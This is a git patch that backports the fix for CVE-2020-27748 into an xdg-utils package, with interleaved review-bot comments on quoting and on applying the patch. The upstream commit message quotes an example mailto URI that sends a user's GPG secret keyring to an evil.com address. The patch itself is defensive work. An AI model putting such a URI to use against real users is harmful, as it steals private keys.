From 512455f3bb937e4f8b0d5a464049cd663aa24609 Mon Sep 17 00:00:00 2001
From: jackie_wu
Date: Tue, 15 Jun 2021 10:52:45 +0800
Subject: [PATCH] fix CVE-2020-27748

---
 CVE-2020-27748.patch | 55 ++++++++++++++++++++++++++++++++++++++++++++
 xdg-utils.spec | 6 ++++-
 2 files changed, 60 insertions(+), 1 deletion(-)
 create mode 100644 CVE-2020-27748.patch

diff --git a/CVE-2020-27748.patch b/CVE-2020-27748.patch
new file mode 100644
index 0000000..de04492
--- /dev/null
+++ b/CVE-2020-27748.patch
@@ -0,0 +1,55 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?=
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+ 
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+ 
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+ 
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+- 
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+-- 
+GitLab
+
diff --git a/xdg-utils.spec b/xdg-utils.spec
index 1bcbc1a..78cc2ce 100644
--- a/xdg-utils.spec
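Review bot: The field decoder the backport leaves in place, `BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))` in the inner `@@ -48,7 +48,6 @@` hunk, still passes an unquoted command substitution of the caller-supplied mailto URI to `/bin/echo -e`, so the `%xx`-decoded value is word-split and glob-expanded before it is appended to the `-compose` string; the TO and CC lines just above this hunk presumably follow the same pattern. If the package wants to go beyond the upstream change, quoting the inner substitution, `BCC=$(/bin/echo -e "$(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')")`, keeps the decoding while removing the expansion. The inner hunks show only parts of run_thunderbird, whose body continues outside them, so checking scripts/xdg-email.in for any remaining `ATTACH` reference (it is dropped from the `local` list in the first inner hunk) is worth doing before the package is built.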
+++ b/xdg-utils.spec @@ -1,6 +1,6 @@ Name: xdg-utils Version: 1.1.3 -Release: 4 +Release: 5 Summary: A set of easily desktop environment integration tools License: MIT URL: http://portland.freedesktop.org/ @@ -9,6 +9,7 @@ Source1: xdg-utils-git_checkout.sh Patch0000: 0001-open-for-post-1.1.3-development.patch Patch0001: 0002-xdg-open-better-pcmanfm-check-BR106636-BR106161.patch +Patch0002: CVE-2020-27748.patch BuildArch: noarch @@ -54,5 +55,8 @@ Help document for th xdg-utils package. %{_mandir}/man1/xdg-* %changelog +* Tue Jun 15 2021 wutao - 1.1.3-5 +- fix CVE-2020-27748 + * Fri Oct 25 2019 Lijin Yang - 1.1.3-4 - Package init
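Review bot: The `+Patch0002: CVE-2020-27748.patch` line in the `@@ -9,6 +9,7 @@` hunk declares the patch, but nothing in the visible hunks shows %prep applying it; unless %prep uses `%autosetup` or `%autopatch`, an explicit line for it (e.g. `%patch0002 -p1`, mirroring how Patch0000 and Patch0001 are applied) is needed, or 1.1.3-5 will ship with a changelog that claims the fix while xdg-email is unchanged. The %prep section lies outside these hunks, so this needs confirming there rather than from the diff. The `-p1` depth follows from the inner patch's `a/scripts/xdg-email.in` paths.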